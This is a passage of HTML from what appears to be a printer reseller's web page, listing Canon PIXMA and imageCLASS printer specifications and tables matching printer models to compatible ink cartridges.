5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment 